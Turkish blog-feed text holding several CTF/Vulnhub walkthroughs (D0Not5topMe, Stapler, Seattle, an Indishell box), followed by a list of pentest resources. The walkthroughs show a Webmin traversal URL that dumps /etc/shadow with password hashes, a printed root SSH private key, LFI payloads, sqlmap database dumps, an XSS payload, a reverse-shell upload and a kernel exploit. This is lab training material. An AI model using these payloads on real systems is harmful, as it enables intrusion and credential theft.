http://D0Not5topMe.ctf/manual/zh-cn/ssl/ ---- + http://D0Not5topMe.ctf/manual/zh-cn/ssl/index.html (CODE:200|SIZE:5042) ----------------- END_TIME: Fri May 12 13:27:48 2017 DOWNLOADED: 433528 - FOUND: 96
Arkaplanda devam ederken kayıt olmaya çalıştım ve başlık bilgilerinde dikkatimi çeken kısım oldu.
http://d0not5topme.ctf/FLaR6yF1nD3rZ_html adresine baktığımızda;
+++++ +++[- >++++ ++++< ]>+++ +++.+ +++++ .<+++ +[->- ---<] >---- ----. ++.<+ +++++ [->++ ++++< ]>+++ ++.<+ +++++ [->-- ----< ]>--- ----. +++++ +.<++ +++++ [->++ +++++ <]>++ +.<++ +++++ [->-- ----- <]>-- ----- ----- -.++. <++++ ++[-> +++++ +<]>+ +++++ +++++ +.<++ ++[-> ++++< ]>+++ +.<++ +++++ +[->- ----- --<]> ----- .<+++ +++++ [->++ +++++ +<]>+ .++++ ++.<+ +++++ ++[-> ----- ---<] >---. <++++ +++[- >++++ +++<] >++++ +++++ ++++. <+++[ ->--- <]>-- ---.< +++++ ++[-> ----- --<]> .+.+. ----- -.+++ +++++ +.-.- ---.< +++++ ++[-> +++++ ++<]> ..-.- .++++ +.++. +++++ ++++. <++++ +++[- >---- ---<] >---- ----- --.-- ---.< +++++ ++[-> +++++ ++<]> +++++ .<+++ [->++ +<]>+ +.++. --.++ .<+++ ++++[ ->--- ----< ]>--- ----- ---.<
Benim de bildim olmadığı için metni gruba sordum, öğrendim ki Brainfuck Gökay kardeşime teşekkür ederim. Ayrıca Çağatay’ın da reklamını yapalım.
https://github.com/cagataycali/awesome-brainfuck
Kodu çalıştırdğımızda flag karşımızda FL46_4:n02bv1rx5se4560984eedchjs72hsusu9 . Yalnız burda üçüncü bayrağı atladığımı farkediyorum. Sil baştan başladım ve smtp portunu gözden kaçırdığımı gördüm (Saatlerimi aldı).
nc -vv 172.189.64.225 25 komutu ile gelen dataya eriştim.
Hex olan datayı çözdüğümüzde aşağıdaki gibi sonuç çıktı.
46 4c 34 36 5f 33 3a 32 39 64 72 79 66 36 37 75 68 65 68 74 32 72 31 64 64 34 71 70 70 75 65 79 34 37 34 73 76 78 79 61 0a FL46_3:29dryf67uheht2r1dd4qppuey474svxya
Sitede hata verdirtmeye çalışırken mail adresini gördüm ve yeni sitemizi bulmuş olduk.
Sitenin kaynağını incelerken game.js içinde yen bir adres buldum ve ordan devam ettim.
Gelen oyunda yine oyunu oynamak yerine kaynak koda baktım ve yeni adresi aldık.
Yeni siteyi /etc/hosts dosyasına ekledikten sonra terminalde kodları çalıştırmaya deniyorum. Parola t3rm1n4l.ctf onu bulduktan sonra
yeni adresi M36u574.ctf olarak buluyorum. Sitede resimler dışında veri bulamadım. Exif ve stenografi incelemesi yaparken “kingmegusta.jpg” resminin açıklamasında base64 veri gördüm.
TWVHdXN0YUtpbmc6JDYkZTEuMk5jVW8kOTZTZmtwVUhHMjVMRlpmQTVBYkpWWmp0RDRmczZmR2V0RGRlU0E5SFJwYmtEdzZ5NW5hdXdNd1JOUHhRbnlkc0x6UUd2WU9VODRCMm5ZL080MHBaMzAK MeGustaKing:$6$e1.2NcUo$96SfkpUHG25LFZfA5AbJVZjtD4fs6fGetDdeSA9HRpbkDw6y5nauwMwRNPxQnydsLzQGvYOU84B2nY/O40pZ30 MeGustaKing:**********
Parolayı da hashcat ile çözdükten sonra ssh bağlantısı deniyorum. (Ki trollendik )
U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg== Salted__�y8j���Rkw0Nl82OnBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0OHRlNjd0ZWpleSAK���i�88$& FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey
Aldığımız bilgilerle ssh bağlantısı için bruto force gerçekleştirdim.
Bundan sonrası en zorlandığım kısım oldu. Id, cat vs. komutlar çalışmadığı için ya echo “$(</etc/passwd)” şeklinde kullanabildim ya da ssh özelliğinden sonuna cat /etc/passwd ekleyerek.
Burdan sonra takıldım ve Linux enumeration scriptlerini denemeye başladım.
Çalıştırılabilir script olarak /usr/bin/wmstrt vardı. Çalıştırdığımda 20’den geriye sayarak “D1dyaCatchaT3nK1l0? ” verdiğim ingilizce tepkiyi burda yazmak isterdim
Biraz düşününce 10000 portunun aktif olduğunu gördüm. 20 saniye sonra servis durduğu için ufak bir araştırmayla for i in {1..1000..1};do echo $(/usr/bin/wmstrt); bu şekilde döngüye soktum.
Çalışan servisi açtığımda https bağlantısına işaret etti.
Ssl ile bağlantı yaptığımda WebAdmin çalıştığını gördüm ve zafiyetini bulmak zor olmadı
https://172.189.64.225:10000/unauthenticated/..%01/..%01/..%01/..%01/etc/shadow
root:$6$6BxJZ5xd$x84bX7slaDzCWbtdQxNjVC92B7YrXlBsUCYVpsoI.MFqcT1tnoTMgXTK6O8Pkm1I7pS/7FvgagDWdkpliygQw1:17260:0:99999:7::: daemon:*:17253:0:99999:7::: bin:*:17253:0:99999:7::: sys:*:17253:0:99999:7::: sync:*:17253:0:99999:7::: games:*:17253:0:99999:7::: man:*:17253:0:99999:7::: lp:*:17253:0:99999:7::: mail:*:17253:0:99999:7::: news:*:17253:0:99999:7::: uucp:*:17253:0:99999:7::: proxy:*:17253:0:99999:7::: www-data:*:17253:0:99999:7::: backup:*:17253:0:99999:7::: list:*:17253:0:99999:7::: irc:*:17253:0:99999:7::: gnats:*:17253:0:99999:7::: nobody:*:17253:0:99999:7::: systemd-timesync:*:17253:0:99999:7::: systemd-network:*:17253:0:99999:7::: systemd-resolve:*:17253:0:99999:7::: systemd-bus-proxy:*:17253:0:99999:7::: Debian-exim:!:17253:0:99999:7::: messagebus:*:17253:0:99999:7::: statd:*:17253:0:99999:7::: avahi-autoipd:*:17253:0:99999:7::: sshd:*:17253:0:99999:7::: burtieo:$6$BBlsb/oG$Aw.HS4JQQ7RgwB.5puvo7yJvXpa5URKfHxUcFYJM42b0pTIkH8Dao3QYrSLADS7Ov4fstuOHHYF8K/Khvpbc//:17257:0:99999:7::: pdns:!:17253:0:99999:7::: mysql:!:17253:0:99999:7::: MeGustaKing:$6$.owswwq.$CMShrXnYmTvT2naqaqCDfUyEYJp0B8MoaW5q4YqU1uOBFlE6xtOby1S7EVvmdqWO5Oe/a5lBog7LovMJC4e/9/:17259:0:99999:7::: dnsmasq:*:17257:0:99999:7:::
Bu kadar aşamadan sonra eriştiğim o root parolası kırılmasa makinayı çözmeyi bırakacaktım. Root parolasını bulmaya çalışırken aklıma başka bir makinadaki yol geldi.
Public ve private key’i elde edip ( /root/.ssh/id_rsa ) bağlanmak.
/root/.ssh/id_rsa... -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,7DA162212961C0CF94C636B47C991024 rDnUjh68EoasdaP40ta9QBeXtvB5uUVH9nKHKWo4KvhLcM4Z0/R6qvjSjlHir4LR uhTb5Y+e2C7Wze8GlYbdGksFXbUztZec26vN7xH8Q4SeI++J77agqKWRE6jJ++hd DsR7vDcqGbm9xX37BbE9Q4lLEHR/hNRe3/Ztrbt3obnCLvCW6H3kzpteycWAQQ3W BaFns85p4AZn654HoIqX/UOkztdYxgOLgpzrLh9p1bRLiaOiBCrURkpYLspeKCNN yfuPvNUgF1+uH78GlvLwfAA6XRj6HPDZ3D22/MxKcGixUVSPXjJlRpqyFQtvSM6T cN5NmXjOjmzfgafqPqf7eTFfLChcsWHUmsSneq7pQhvw/vfeGX2kizuXCago+yWt 2IlFusQilfDDzybiunNOp+njD7TxeBLFcAUVdACfMUQ/fC0GHKeHB8q79Wi7r0SQ m0eC6fIXJpDavN9PtPF2v+5OH9EDKycaeWMmWT0S0fNMmIhHb+U/uhtDjQx+M9fI I5aBCjzCsDCoKT0qkv+dTafyqSzUN9EupCRh0NcsUT00yrQkxzM5L6C3H+61SNq8 CNi4I50aDp8q6m0KP/GZhUAU9Uegj+JZQ1h5MSnjOpOvKbD4l6/rWM02iFVAmg4O WjSQfqbxGCmoHE8Y7iqgB8lRWnDYPssDXIMx+1pBkNkBASMpz6gJBZ//rJE1PkVr aKdhbJFR1NX097z3HXS/7SBJmyuctG+JviH7mp1fH3WMAk2iu4nSiE1aNH1YV/nW rXNOi5c7/yDE9o/weuJoCBL4VXeH89+l8551JOGU9RMuNk0pi/SSaUwwn7wR0/Yf b9Sk3pbFDS64AON1T+4zlBWWif8aRMJ7Vm6zkDsE1Jq9nKcNzDknfufs45mKVzXU m9dlGgzfNF46yPCuHzBZt4q1wrzg5/7gcWx5Qq6xD5VtWiMlB4G3D8DruaeqgTOi Sh/jFqEOErA015Ympz/0Hh/lFn0NAAJy89BPG86d+VVAn5YstQEqH6zzuIy9mZ9K 853+0BUxA0I9rEessa+Q+NlFadBVE2FcJAr7rMsLGZFoqfvWxg5hBJFJ7jrjpQNe Q9qzA/CbiMeU+zdifXZwprJR1fNVWalPJJGwotwVgXN/z4s8iN1gMN9y4Kynue9k zQ/HqvgTkyX52ojLnM/PkXCyx7EXBAOJi5s6fv/22kcZ5Xkpw+x/VILPnJqObmU9 RZ3IB6kbckiMld5GX+xMvYi9rvmHf/mdLj75e7PU+FjCufApXAi+T10PnvMvrCGS FkSlVyPPo1s4klTdrf2l6tkK6Lqu/7SamkvQvMsY7wnNT4OPI95y3GoRnwEFLd7w honOroF1U6leA5O8jxSxI/CIwxvb5DO/sX4bZxShlhD98yO74ImAg5ACTj/eUaVA /Q7bpfasSnqdKNWhx81pD6Ee9WeBZv8c0I0/EqS188O1qFYbtsaqZhYytTqYwvZ0 p6QuusMnDaA1nB8wL7ltKXt5PhBBxSVbUKtP6DWcBRviItFTsAnmK1QhD2wmTkCu B8ochgwCgtAUs4cUXxnZrp5pu2yvu8Dhf//z8lBtoItPh5LTmW1N1g4s+9NKt72P -----END RSA PRIVATE KEY-----
/root/.ssh/id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPKVt8KEVrr80LT9ZwRsWG8w9O2vgWd99+2+xmi3WCgCR/IrhqoJqEhX9owwiaUUnyRWrj9AKDj8Neetju9rOCTJsvWAlfFgyrRXkOV9twpLcrML+LC5GsVGLH7U/R2sTpT9Ywad0yL+FTvHZ+AbYLFpml4Gbhat6Ynhcg3Q6XmxGHXkV9cd6/XCx74K8CKEtOye1REj8KDtsC329qvbp/9Dt1ZZQEAUFvLqgLJiZxmH5snWiszcO2TKQ3lUw3tLy5rA/bXe3Bf4zuEmktEuA0NW+FTLYELrBy/5PK007Uh0CQVpVS5C+tkLtqh6meAXPp7dhi/B6qGOIXpPxjpUjH root@D0Not5top
Kırdığım parolayı da kullanarak bağlantıyı sağlıyorum. ssh -i id_rsa [email protected] .
Sonuç:
Root dizininden de son flag çıkmış oldu.
###################################################### # # # W311 D0n3 # # Y0u D1d N0t5top # # Much0 M3Gu5t4 :D # # # # 3mrgnc3 # # # # Hope you had fun... # # 8ut... # # # # p.s.. # # 571ll 1 M0r3 f146 :D # # # ###################################################### FL46_7:9tjt86evvcywuuf774hr88eui3nus8dlk N3v3r As5um3! 1t M4k35 4n 455 0f y0u & m3 :DWS
Her ne kadar orta seviye makina dense de çözümü gayet kolay. Makinamızın ip adresini nmap -sS -sV 192.168.43.1/24 (2 cihaz bağlı olduğunu bildiğim için bu şekilde yazdım) komutuyla öğrenelim. Nmap scan report for indishell (192.168.43.120) Host is up (0.000081s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian […]
]]>Her ne kadar orta seviye makina dense de çözümü gayet kolay.
Makinamızın ip adresini nmap -sS -sV 192.168.43.1/24 (2 cihaz bağlı olduğunu bildiğim için bu şekilde yazdım) komutuyla öğrenelim.
Nmap scan report for indishell (192.168.43.120) Host is up (0.000081s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) MAC Address: 08:00:27:1C:31:B1 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for parrot (192.168.43.24) Host is up (0.0000020s latency). All 1000 scanned ports on parrot (192.168.43.24) are closed
22 ve 80 portlarının açık olduğunu görüyoruz. 80 portunda çalışan servise bakalım.
“Sqli yeteneği göster”i görünce burp suite ile sqli payloadlarını denettim. Ama kaynak koda baktığımda sayfa her yenilendiğinde çalışan “Tekrar Deneyiniz” yazısı bastıran script’i görünce troll olduğunu farkettim.
Diğer dizinlerden yola çıkmak adına dirb ile bruto force yaptırdım. Wordlist kullandım, phpmy dizini de vardı buraya ek olarak.
Sayfaları dolaşırken http://192.168.43.120/add adresinde dosya yükleme olduğunu gördüm ve filtre bypass ile shell atabilirim diye denedim. Yükleme yapmadı.
Test.php adresinde file parametresi ile komut çalıştırılabileceğini tahmin ettim.
curl -X POST –data “file=/etc/passwd” http://192.168.43.120/test komutu ile file parametresinden dosya okuyabildiğimizi farkettim.
Tekrar index.php’ye döndüğümde c.php dosyasını okuduğunu gördüm ve burdaki parolaları denediğimde yine giriş yapamadım.
Ssh portunun açık olduğunu ve phpmyadmin olduğunu düşününce config.inc.php dosyasını okudum ve bu bilgilerle ssh bağlantısı yaptım.
Root yetkisiyle giriş yaptık…
]]>Stapler zafiyetli makine için root olmamız isteniyor. Makineyi indirmek için; https://download.vulnhub.com/stapler/Stapler.zip Makineyi indirip sanal makineye attım. Artık teste başlayalım. Öncelikle makinenin IP adresini belirlemem gerekiyordu. Bulunduğum ağdaki IP aralığındaki makineleri tespit ettim. nbtscan 192.168.1.0/24 Sızmak istediğim makine IP adresi 192.168.1.53 olarak buluyorum. Makineye bir nmap taraması gerçekleştirip hangi portları açık onlara bakalım. nmap -sS -sV 192.168.1.53 […]
]]>Stapler zafiyetli makine için root olmamız isteniyor. Makineyi indirmek için;
Makineyi indirip sanal makineye attım. Artık teste başlayalım.
Öncelikle makinenin IP adresini belirlemem gerekiyordu. Bulunduğum ağdaki IP aralığındaki makineleri tespit ettim.
nbtscan 192.168.1.0/24
Sızmak istediğim makine IP adresi 192.168.1.53 olarak buluyorum. Makineye bir nmap taraması gerçekleştirip hangi portları açık onlara bakalım.
nmap -sS -sV 192.168.1.53 -Pn -n -p-
Makine de 21 /ftp, 22/ ssh, 53/ domain, 80/ http, 139 / netbios-ssn, 666/doom, 3306/mysql, 12380/http portlarının açık halde olduğu ortaya çıktı.
Öncelikle http/80 portu açık olduğu için browser üzerinden buraya bakalım neler bulacağız. Buradan birşey çıkmıyor bir hata sayfası varmış.
O zaman bir de 12380 portuna bakalım. Biraz bunu kurcalayayım diyerek browser üzerinde baktığımda bir web sayfası açıldı.
Sayfayı kurcaladığımda birşeyler bulamadığımı fark ettim ve bu temayı araştırarak wordpress bir tema olduğunu buldum.
Bu web sayfası üzerinden giderek veri elde edebileceğimi düşünerek zafiyet aramaya başladım. Öncelikle işimi biraz kolaylaştırması amacıyla nikto aracından faydalandım.
nikto -h 192.168.1.53
nikto -h 192.168.1.53 -p 12380
Tarama sonucunda;
Bu dizinlerin varlığını kontrol etmeye kalktığımda,
***NOT: Buradaki önemli nokta https:// ile istek atmam gerektiğiydi.
Sayfaları biraz kurcalamaya başladım. Sonra bu web sayfasının wordpress olduğunu öğrendiğim için WPSCAN yardımıyla zafiyet taraması gerçekleştirdim.
Wpscan taramasında Advanced Video v1.0 eklentisi için exploit-db de yayınlanan zafiyetin bulunduğu adres üzerinden LFI deneyeyim diye düşündüm.
Bu farklı boyuttaki jpeg dosyalarını kendi makineme indirip bir inceleyeyim diye düşündüm.
Şimdi phpmyadmin e giriş yapabilirim.
Bu kullanıcı adları ssh veya ftp bağlantısı gerçekleştirmek istediğimde kullanılabilir diye tek tek hepsini denedim fakat hiçbirisi ile başarılı bağlantı gerçekleştiremedim.
LFI zafiyeti bulunan adreste /etc/passwd dosyasınını da okumaya çalıştım. Ama hata ile karşılaştım.İşte bu güzel çünkü dizin yapısı geldi.
../../../../../../../../../etc/passwd dizinine gitmek istediğimde ise dizin hatasının ortadan kalkıyor ve yine bir post linkini veriyor.
/etc/passwd dosya okuması için attığım her istek sonucunda https://192.168.1.53:12380/blogblog sayfasında yine yeni bir post yayınlandı.
Böylece /etc/passwd dosyasını görüntülemiş olduk.
Şimdi phpmyadmin de root olarak giriş yapabiliyorum. O zaman phpmyadmin yoluyla makineye bir shell.php dosyası yüklemeyi deneyebilirim.
Öncelikle Pentest Monkey Shell dosyası indiriyorum.
Netcat yardımıyla portu dinliyorum ve browser da meryem2.php shell dosyasına tıklayınca terminalde shell e düştüm.
YETKİ YÜKSELTME
/home dizinine geçip tüm kullanıcıların /.bash_history dosyasını okuyabilirim.
O zaman örnek olarak peter kullanıcısı için ssh bağlantısı gerçekleştirmeye çalışıyorum. Parola doğru ve giriş yapabildim.
sudo -i ile peter kullanıcısına root yetkisi verdiriyorum. Peter için aynı parolayı giriyorum ve artık root yetkilerine sahibim.
ls -la ile bakıyorum şimdi burada neler neler varmış. Bir flag.txt dosyası dikkatimi çekiyor.
cat flag.txt ile okuduğumda —–(:::Congratulations:::)—– flag karşımda
Yetki yükseltmek için başka bir yöntem de deneyebiliriz. Makineye shell attığımda kernel bilgilerini veriyordu.
Ama yine de biz bunu farklı yöntemlerle de öğrenebiliriz.
Linux Kernel 4.4.0.21 araştırdığımda exploit-db de zafiyetinin yayınlandığını gördüm.
Zafiyeti exploit edebileceğimiz script ise burada yer alıyor.
ebpf_mapfd_doubleput_exploit isimli bir klasör çıktı. Klasör içine giriyorum. Önce ./compile.sh dosyasını çalıştırıyorum.
Sonra ./doubleput dosyasını çalıştırıyorum. Ve artık root yetkilerine sahibim.
Merhaba arkadaşlar, Bugün Vulnhub’da yayınlanan Seattle v0.3 makinesini çözmeye çalışacağız. Hemen başlayalım. Önce indirdiğimiz makineyi VM yazılımınızla ayaklandırın. Makinenin kullanıcı adı root parolası ise PASSWORD Saldırı yapacağımız hedef makinenin öncelikle IP adresini öğrenmemiz gerekiyor. Bunu network taramaları ile yapabilirsiniz. Makine elimizde olduğu için hızlıca makineye erişip Terminal’e ifconfig yazarak hedef sistemin IP adresini öğrenmiş olduk. IP adresini öğrendikten sonra saldırı için bilgi toplama aşamasına […]
]]>Merhaba arkadaşlar,
Bugün Vulnhub’da yayınlanan Seattle v0.3 makinesini çözmeye çalışacağız. Hemen başlayalım.
Önce indirdiğimiz makineyi VM yazılımınızla ayaklandırın. Makinenin kullanıcı adı root parolası ise PASSWORD
Saldırı yapacağımız hedef makinenin öncelikle IP adresini öğrenmemiz gerekiyor. Bunu network taramaları ile yapabilirsiniz. Makine elimizde olduğu için hızlıca makineye erişip Terminal’e
ifconfig
yazarak hedef sistemin IP adresini öğrenmiş olduk.
IP adresini öğrendikten sonra saldırı için bilgi toplama aşamasına geçebiliriz. Hedef sistem aynı ağda bulunduğu için öncelikli işimiz port taramak oluyor.
SYN taraması yaptığımızda aşağıda ki çıktı ile karşılaşıyoruz.
nmap -sS -sV 192.168.1.55
Göründüğü gibi sistemin 80 portu üzerinde Apache servisi çalışıyor. Bunun dışında bir sonuçla karşılaşmadık. O zaman IP adresine HTTP üzerinden bağlanalım. Tarayıcımıza IP adresini yazıp bağlandığımız da karşımıza Seattle Sounds başlığı bulunan bir site karşılıyor.
İlk aşamada port tarama işlemi sonucunda sadece 80 portunun açık olduğunu öğrendiğimiz için bu web sitesi üzerinden gitmemiz gerektiği kararına varabiliriz.
Siteyi hızlıca incelerken Catalogue adlı bir link ilgimi çekti. Bu linke tıklayınca web uygulaması bize bir pdf dosyası indirme bağlantısı sunuyor.
http://192.168.1.55/download.php?item=Brochure.pdf # linkimiz bu
Yukarıda ki link son kullanıcı için masum gözükse bile zarar vermek niyetinde olan kişiler için çokta sağlıklı bir yapıda değil.
Aşağıda ki gibi pdf dosyasının yerine linux dosya sisteminde kullanılan ve bir üst dizine çıkmayı belirten ” ../” karakterler ile linux sistemlerde kullanıcı kayıtlarını tutan passwd dosyasının yolunu yazdık ve karşımıza bu dosyanın içeriği geldi.
http://192.168.1.55/download.php?item=../../../../../../../../etc/passwd
Not: Burada geri gelme karakterlerini çok fazla kullanmamızın sebebi dizin yapısını tam olarak bilememizdir. İsterseniz yüzlerce kullanabilirsiniz linux tabanlı sistemlerde en üst dizin olan root dizinine çıkacaktır.
Aşağıda passwd dosyasının içeriğini görmektesiniz.
Kullandığımız bu açığın literatürde ki ismi Path Traversal/LFI ‘dir. Şimdi bir de web app penetration testlerinde çokça kullanılan nikto adlı araç ile web uygulamamızı bir kontrol edelim.
nikto -h http://192.168.1.55/ -o nicktoresults.txt
Şeklinde kodu terminalimize giriyoruz.Bu kodu açıklamak gerekirse -h argümanı hostname’i -o ise output u temsil eder. Yani -o argümani ile çıktılarımızı nicktoresults.txt diye bir txt dosyasına kaydediyoruz.
çıktı sonucu aşağıda ki gibidir.
- Nikto v2.1.6/2.1.5 + Target Host: 192.168.1.55 + Target Port: 80 + GET Cookie level created without the httponly flag + GET Retrieved x-powered-by header: PHP/5.6.14 + GET The anti-clickjacking X-Frame-Options header is not present. + GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + VYUPBYCA Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST + GET Uncommon header 'content-disposition' found, with contents: filename="downloads" + GET /config.php: PHP Config file may contain database IDs and passwords. + OSVDB-3268: GET /admin/: Directory indexing found. + OSVDB-3092: GET /admin/: This might be interesting... + OSVDB-3268: GET /downloads/: Directory indexing found. + OSVDB-3092: GET /downloads/: This might be interesting... + GET Server leaks inodes via ETags, header found with file /manual/, fields: 0x2304 0x51b0c59e09040 + OSVDB-3092: GET /manual/: Web server manual found. + GET /info.php: Output from the phpinfo() function was found. + OSVDB-3233: GET /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. + OSVDB-3268: GET /icons/: Directory indexing found. + OSVDB-3268: GET /manual/images/: Directory indexing found. + OSVDB-3268: GET /images/: Directory indexing found. + OSVDB-3268: GET /images/?pattern=/etc/*&sort=name: Directory indexing found. + OSVDB-3233: GET /icons/README: Apache default file found. + GET Cookie lang created without the httponly flag + GET /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found. + OSVDB-5292: GET /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
Bu sonuçlara göre bir baştan gidelim isterseniz.
/admin/ şeklinde bir path girdiğimizde içeride ki dosyaları görebiliyoruz.
İsterseniz LFI açığı sayesinde bu dosyaları indirebilirsiniz. Aşağıda rastgele olarak girilmiş indirilmiş olan iki adet dosya örneği vardır.
http://192.168.1.55/download.php?item=../admin/admincontent.php
http://192.168.1.55/download.php?item=../config.php
Nikto sonuçlarına göre phpinfo yu da
http://192.168.1.55/info.php
‘ dan okuyabiliyoruz.
Nikto sonuçlarını daha sonra değerlendirmek için bir kenara bırakıyoruz ve bir diğer çok kullanılan program olan Burp Suite programımızı başlatıyoruz.
Iceweasel ile ayarlarımızı yaptıktan sonra intercept imiz açık bir şekilde siteye istek gönderiyoruz ve yakalanan veriyi spider’a atıyoruz. Target kısmında ise spider ımızın yaptığı işi görüyorsunuz.
Burada ki sonuca göre GET ile çekilen bazı sayfaları denemek gerekebilir.
Rastgele bir sayfa seçerek burp suite ile araya girelim.
Burada action’a tıklayarak bunu repeater a gönderdim burada bazı denemelerimiz olacak.
Aşağıda ki resimde bir çok deneme yaptım type kısmında false-positive aradım fakat bulamadım bende prod=1 argümanında aramaya karar verdim ve burada db’yi hata vermeye zorladım. Bu gibi durumlarda SQLi olabileceğinden şüphelenebiliriz.
SQLi olduğunu düşündüğüm için yine kali üzerinde bulunan sqlmap yazılımını kullanacağım.
Kullandığım parametreler =
sqlmap -u "192.168.1.42/details.php?prod=1&type=1" --dbms MySQL --level 3 --risk 3 --dbs
sqlmap -u "192.168.1.42/details.php?prod=1&type=1" -p prod --dbms MySQL --level 3 --risk 3 --dbs
Burada ki komutları kısaca açıklarsak;
dbms: Database Management System, Database sistemini seçiyoruz bu MySQL olabilir MSSQL olabilir tamamen siteye bağlıdır. İlk sql injection dediğimizde bize mysql çıktısını vermişti o yüzden Mysql seçtik.
–level: Burada bazı sistemlerde bulunan filtreleme metodları vardır bunları atlatabilmek için (eğer varsa) böyle bir komut giriyoruz. Level ve risk gibi parametreleri belirtmezisek not injectable olarak çıktı gönderebilir.
–dbs: Database i enumerate ( türkçe olarak saymak/dökmek kullanabiliriz sanırım ) etmek için kullanıyoruz.
-p ise verdiğimiz url de hangi parametreye bu atakları yapacağını belirtmemizi sağlıyor.
Diğer komutlar için
sqlmap --help | grep "\--dbs" #Örnek
şeklinde komutlara bakabilirsiniz. Burada gönderdiğimiz komutlar ile get metodu olduğu unutulmasın eğer post metodu kullanılsaydı –data şeklinde bir kullanımımız olacaktı.
Şimdilik burada bir şey bulamadık siteyi biraz daha gezelim.
Not: Eğer bu kısımda bir zafiyet var ise aşağıya yorum olarak belirtirseniz hem ben hemde yazıyı okuyabilecek kişiler faydalanmış olur.
Artık 2-3 tool’un genel anlamıyla nasıl kullanıldığını da anlatmış olduk o yüzden sonuç odaklı gideceğim.
Login sayfasında bir deneme yapalım.
Burada yapılan isteği raw olarak kaydettik. Sağ tık save item dediğinizde nereye kaydetmek isteyeceğinizi soracaktır.
Bu kaydettiğimiz dosyayı sqlmap ile otomatize edeceğiz.
sqlmap -r deneme --dbs
Gördüğünüz gibi bize db isimlerini çekti.
Bizim istediğimiz bilgiler olasılıkla seattle db’inde olacaktır.
Şimdi
sqlmap -r deneme --dbs -D seattle --tables
-D kısmıyla db ‘ mizi seçtik ve tables ile tabloları istediğimizi belirttik.
sqlmap -r deneme --dbs -D seattle --columns
Eğer adım adım gitmek isterseniz bu şekilde gidebilirsiniz ama ben direk dump olarak almak istedim o yüzden
sqlmap -r deneme --dbs -D seattle --dump-all
yukarıda ki komutu girdim ve artık admin parolamız elimizde.
Çıktımız :
Kullanıcı adı: [email protected]
Parola: Assasin1
Şimdi birde blog kısmına bakalım burada admin bloglarına tıkladığımızda
blog.php?author=admin gibi bir get ibaresi görüyoruz ve aşağıda da admin yazıyor.(SQL inj denemeleri yapsam da bir sonuç alamadım.)
Buradan xss almaya çalışalım.
Burada html kodlarına baktığımızda yazdığımız ibarenin
olduğunu görüyoruz.
<span class="author-bizimibaremiz">bizimibaremiz</span>
Öncelikle bizim tırnak içinden ‘ ” ‘ ile çıkmamız daha sonra da span tagını kapatmamız gerekiyor.
Bunun içinde ben! ( Siz daha farklı yapabilirsiniz )
"\><script>alert(1)</script
şeklinde bir payload ile alertimi aldım.
Ekstra bir not :
Dil kısımlarından GBP kısmını silip ../../../etc/passwd yaptığımda ekrana direk olarak passwd ekranı dökülmedi fakat ürünler sayfasına geldiğimizde orada ürünler kısmında passwd içeriğini görebildim.
Bunun neden olduğunu emin olun bilmiyorum en mantıklı açıklamam bu şekilde.
Bunu tekrar sağlamak istediğimde
products.php?LANG=../../etc/hosts
şeklinde giriş yaptığımda mantığımın doğru olduğunu da sağlamış oldum.
Neyse daha fazla uzatmadan aslında bu yazımızda sql injection , xss , lfi / path traversal görmüş olduk.Zaten LFI ile ilk başlarda mysql user passwordunu de çekmiştik. Burada asıl amacımız çeşitli toolların kullanımını görmekti.
https://www.vulnhub.com/entry/seattle-v03,145/
Başka bir yazıda görüşmek üzere esen kalın.
]]>Online Kaynaklar: Sızma Testi Kaynakları Metasploit Unleashed – Ücretsiz Metasploit Kursları PTES – Sızma Testi Standartları OWASP – Web Uygulama Güvenliği Projesi Shellcode Geliştirme Shellcode Örnekleri – Shellcode Veritabanı Sosyal Mühendislik Kaynakları Kilit Kırma Kaynakları Schuyler Towne Youtube Channel – Kilit Kırma Teknikleri Reddit Lockpicking – Kilit Kırma Teknikleri ve Araç Önerileri Araçlar Sızma Testi Dağıtımları Kali BlackArch […]
]]>Online Kaynaklar:
Shellcode Geliştirme
Sosyal Mühendislik Kaynakları
Kilit Kırma Kaynakları
Schuyler Towne Youtube Channel – Kilit Kırma Teknikleri
Reddit Lockpicking – Kilit Kırma Teknikleri ve Araç Önerileri
Araçlar
Sızma Testi Dağıtımları
Basit Sızma Testi Araçları
Zafiyet Tarama Araçları
Ağ Araçları
Kablosuz Ağ Araçları
SSL Analiz Araçları
HEX Düzenleme
Kırma Araçları
Windows Araçları
DDoS Araçları
Sosyal Mühendislik Araçları
OSInt Araçları
Gizlilik Araçları
Tersine Mühendislik Araçları
Kitaplar
Sızma Testi Kitapları
Hacker ın El Kitabı Serisi
Ağ Analiz Kitapları
Tersine Mühendislik Kitapları
Zafiyet Veritabanları
Güvenlik Kursları
Ctf Kütüphaneleri
Bilgi Güvenliği Konferansları
En Yaygın 125 Ağ Güvenliği Aracı
]]>
